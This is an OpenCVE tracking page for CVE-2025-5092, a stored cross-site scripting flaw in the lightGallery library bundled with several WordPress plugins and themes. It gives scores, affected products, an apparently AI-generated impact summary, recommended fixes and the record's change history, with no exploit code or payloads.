Description
Multiple plugins and/or themes for WordPress are vulnerable to Stored Cross-Site Scripting via the plugin's bundled lightGallery library (<= 2.8.3) in various versions due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Published: 2025-11-20
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross-Site Scripting that can execute injected scripts when users view affected pages
Action: Immediate Patch
AI Analysis

Impact

The vulnerability arises from the bundled lightGallery JavaScript library (version 2.8.3 or earlier) used by several WordPress plugins and themes. Insufficient sanitization of user‑supplied attributes allows an attacker who can authenticate as a Contributor or higher to store arbitrary JavaScript code in gallery or image metadata. When an affected page is viewed, the injected script runs in the context of the site, enabling content theft, session hijacking, or site defacement.

Affected Systems

Any WordPress site that has one of the following plugins or themes installed and is using lightGallery 2.8.3 or older: OnePress, Gallery with thumbnail slider, LightGallery WP, Image Hover Effects Ultimate, TP WooCommerce Product Gallery, Ibtana – WordPress Website Builder, Royal Addons for Elementor – Addons and Templates Kit for Elementor, Portfolio, Gallery, Product Catalog – Grid KIT Portfolio. Precise version ranges are not listed; the issue exists in all releases that contain the vulnerable library.

Risk and Exploitability

The CVSS score of 6.4 indicates moderate severity, and the EPSS score of less than 1% suggests a low likelihood of observed exploitation. The vulnerability is not listed in the CISA KEV catalog. Exploitation requires an authenticated session with Contributor or higher privileges; once injected, the malicious script will affect all users who view the page containing the stored payload. Active defenses such as a Content Security Policy could mitigate the impact, but no automated exploit has been reported.

Generated by OpenCVE AI on April 20, 2026 at 21:35 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade all affected themes and plugins to a version that removes or updates the lightGallery library beyond 2.8.3.
  • If an update is not immediately available, delete or sanitize any stored gallery or image data that could contain malicious attributes, then reset or recreate gallery entries.
  • Restrict Contributor role permissions to remove media upload or gallery editing capabilities until a patch is deployed.

Generated by OpenCVE AI on April 20, 2026 at 21:35 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 24 Nov 2025 20:00:00 +0000

Type Values Removed Values Added
References

Mon, 24 Nov 2025 09:15:00 +0000

Type Values Removed Values Added
First Time appeared Famatehemes
Famatehemes onepress
Galaxyweblinks
Galaxyweblinks gallery With Thumbnail Slider
Lightgalleryteam
Lightgalleryteam lightgallery Wp
Tplugins
Tplugins tp Woocommerce Product Gallery
Vowelweb
Vowelweb ibtana
Wordpress
Wordpress wordpress
Wpkin
Wpkin image Hover Effects Ultimate
Wproyal
Wproyal royal Elementor Addons And Templates
Wpsofts
Wpsofts portfolio Gallery, Product Catalog - Grid Kit Portfolio
Vendors & Products Famatehemes
Famatehemes onepress
Galaxyweblinks
Galaxyweblinks gallery With Thumbnail Slider
Lightgalleryteam
Lightgalleryteam lightgallery Wp
Tplugins
Tplugins tp Woocommerce Product Gallery
Vowelweb
Vowelweb ibtana
Wordpress
Wordpress wordpress
Wpkin
Wpkin image Hover Effects Ultimate
Wproyal
Wproyal royal Elementor Addons And Templates
Wpsofts
Wpsofts portfolio Gallery, Product Catalog - Grid Kit Portfolio

Thu, 20 Nov 2025 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Thu, 20 Nov 2025 06:45:00 +0000

Type Values Removed Values Added
Description Multiple plugins and/or themes for WordPress are vulnerable to Stored Cross-Site Scripting via the plugin's bundled lightGallery library (<= 2.8.3) in various versions due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
Title Multiple Plugins and Themes <= (Various Versions) - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via lightGallery JavaScript Library
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

Subscriptions

Famatehemes Onepress
Galaxyweblinks Gallery With Thumbnail Slider
Lightgalleryteam Lightgallery Wp
Tplugins Tp Woocommerce Product Gallery
Vowelweb Ibtana
Wordpress Wordpress
Wpkin Image Hover Effects Ultimate
Wproyal Royal Elementor Addons And Templates
Wpsofts Portfolio Gallery, Product Catalog - Grid Kit Portfolio
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T17:14:57.172Z

Reserved: 2025-05-22T16:48:25.802Z

Link: CVE-2025-5092

cve-icon Vulnrichment

Updated: 2025-11-20T15:43:09.730Z

cve-icon NVD

Status : Deferred

Published: 2025-11-20T15:17:37.650

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-5092

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-20T21:45:18Z

Weaknesses